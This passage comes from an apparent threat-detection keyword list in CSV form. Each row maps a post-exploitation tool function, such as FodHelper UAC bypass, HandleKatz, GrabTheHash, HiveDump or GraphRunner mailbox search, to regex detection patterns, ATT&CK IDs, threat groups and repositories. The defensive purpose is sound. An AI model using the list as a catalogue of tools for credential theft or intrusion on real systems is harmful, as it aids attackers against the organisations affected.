Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49045" "*Invoke-FodHelperBypass*",".{0,1000}Invoke\-FodHelperBypass.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-FodHelperBypass.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49046" "*Invoke-FodHelperBypass*",".{0,1000}Invoke\-FodHelperBypass.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1127","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49047" "*Invoke-FodHelperBypass.ps1*",".{0,1000}Invoke\-FodHelperBypass\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - 
T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49048" "*Invoke-ForgeUserAgent -Device *",".{0,1000}Invoke\-ForgeUserAgent\s\-Device\s.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","49049" "*Invoke-ForgeUserAgent*",".{0,1000}Invoke\-ForgeUserAgent.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","7","652","105","2024-12-06T15:51:42Z","2021-07-08T02:28:12Z","49050" "*Invoke-FruityC2*",".{0,1000}Invoke\-FruityC2.{0,1000}","offensive_tool_keyword","FruityC2","FruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 
- T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","49051" "*Invoke-Get-FirefoxPasswords*",".{0,1000}Invoke\-Get\-FirefoxPasswords.{0,1000}","offensive_tool_keyword","Dispossessor","credential scripts used by the Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","49052" "*Invoke-Get-RBCD-Threaded*",".{0,1000}Invoke\-Get\-RBCD\-Threaded.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49053" "*Invoke-Get-RBCD-Threaded*",".{0,1000}Invoke\-Get\-RBCD\-Threaded.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49054" "*Invoke-GlobalMailSearch*",".{0,1000}Invoke\-GlobalMailSearch.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","49055" "*Invoke-GlobalMailSearch*",".{0,1000}Invoke\-GlobalMailSearch.{0,1000}","offensive_tool_keyword","MailSniper","To search all mailboxes in a domain","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Reconnaissance","https://github.com/dafthack/MailSniper","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","49056" "*Invoke-GlobalO365MailSearch*",".{0,1000}Invoke\-GlobalO365MailSearch.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","49057" "*Invoke-GoFetch*",".{0,1000}Invoke\-GoFetch.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","Dispossessor","Discovery","https://github.com/GoFetchAD/GoFetch","1","1","N/A","N/A","10","7","633","99","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z","49058" "*Invoke-Gopher*",".{0,1000}Invoke\-Gopher.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49059" "*Invoke-GPPPasswordCheck*",".{0,1000}Invoke\-GPPPasswordCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49060" "*Invoke-GPPPasswordCheck*",".{0,1000}Invoke\-GPPPasswordCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49061" "*Invoke-GrabTheHash*",".{0,1000}Invoke\-GrabTheHash.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","49062" "*Invoke-GrabTheHash*",".{0,1000}Invoke\-GrabTheHash.{0,1000}","offensive_tool_keyword","Invoke-GrabTheHash","Get the NTLM Hash for the User or Machine Account TGT held in your current session","T1558.004 - T1003.004","TA0006","N/A","N/A","Credential Access","https://github.com/Leo4j/Invoke-GrabTheHash","1","1","N/A","N/A","8","1","6","1","2023-10-26T10:52:51Z","2023-08-22T12:14:53Z","49063" "*Invoke-GraphOpenInboxFinder -Tokens*",".{0,1000}Invoke\-GraphOpenInboxFinder\s\-Tokens.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","49064" "*Invoke-GraphOpenInboxFinder*",".{0,1000}Invoke\-GraphOpenInboxFinder.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","Checks each user's inbox in a list to see if they are readable","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","49065"
"*Invoke-GraphRecon*",".{0,1000}Invoke\-GraphRecon.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","Performs general recon for org info user settings directory sync settings etc","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","49066" "*Invoke-GraphRunner*",".{0,1000}Invoke\-GraphRunner.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","Runs Invoke-GraphRecon - Get-AzureADUsers - Get-SecurityGroups - Invoke-DumpCAPS - Invoke-DumpApps - and then uses the default_detectors.json file to search with Invoke-SearchMailbox - Invoke-SearchSharePointAndOneDrive - and Invoke-SearchTeams.","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","49067" "*Invoke-Grouper2*",".{0,1000}Invoke\-Grouper2.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49068" "*Invoke-Grouper2*",".{0,1000}Invoke\-Grouper2.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation 
tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49069" "*Invoke-Grouper3*",".{0,1000}Invoke\-Grouper3.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49070" "*Invoke-Grouper3*",".{0,1000}Invoke\-Grouper3.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49071" "*Invoke-HandleKatz*",".{0,1000}Invoke\-HandleKatz.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49072" "*Invoke-HandleKatz*",".{0,1000}Invoke\-HandleKatz.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49073" "*Invoke-Handlekatz*",".{0,1000}Invoke\-Handlekatz.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest 
AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49074" "*Invoke-HardenedUNCPathCheck*",".{0,1000}Invoke\-HardenedUNCPathCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49075" "*Invoke-HijackableDllsCheck*",".{0,1000}Invoke\-HijackableDllsCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49076" "*Invoke-HijackableDllsCheck*",".{0,1000}Invoke\-HijackableDllsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49077" "*Invoke-HiveDump*",".{0,1000}Invoke\-HiveDump.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black 
Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","49078" "*Invoke-HiveDump*",".{0,1000}Invoke\-HiveDump.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","49079" "*Invoke-HiveNightmare.ps1*",".{0,1000}Invoke\-HiveNightmare\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","49080" "*Invoke-HoneypotBuster*",".{0,1000}Invoke\-HoneypotBuster.{0,1000}","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","1","N/A","N/A","8","3","282","57","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z","49081" "*Invoke-HostEnum -*",".{0,1000}Invoke\-HostEnum\s\-.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host 
enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/red-team-scripts","1","0","N/A","N/A","10","10","1122","195","2024-11-19T19:39:01Z","2017-05-01T13:53:05Z","49082" "*invoke-hostenum -*",".{0,1000}invoke\-hostenum\s\-.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - 
T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","49083" "*Invoke-HostEnum*",".{0,1000}Invoke\-HostEnum.{0,1000}","offensive_tool_keyword","red-team-scripts","script comprised of multiple system enumeration / situational awareness techniques collected over time. If system is a member of a Windows domain. it can also perform limited domain enumeration with the -Domain switch","T1016 - T1087.001 - T1049 - T1069","TA0007 - TA0003 - TA0006","N/A","N/A","Discovery","https://github.com/threatexpress/red-team-scripts","1","1","N/A","N/A","N/A","10","1122","195","2024-11-19T19:39:01Z","2017-05-01T13:53:05Z","49084" "*Invoke-HostRecon*",".{0,1000}Invoke\-HostRecon.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - 
TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49085" "*Invoke-HostRecon*",".{0,1000}Invoke\-HostRecon.{0,1000}","offensive_tool_keyword","HostRecon","Invoke-HostRecon runs a number of checks on a system to help provide situational awareness to a penetration tester during the reconnaissance phase of an engagement. It gathers information about the local system. users. and domain information. It does not use any 'net. 'ipconfig. 'whoami. 'netstat. or other system commands to help avoid detection.","T1082 - T1087 - T1033","TA0001 - TA0007 - ","N/A","N/A","Discovery","https://github.com/dafthack/HostRecon","1","1","N/A","N/A","N/A","5","446","120","2017-10-03T13:25:06Z","2017-03-28T14:53:21Z","49086" "*invoke-hostscan*",".{0,1000}invoke\-hostscan.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","49087" 
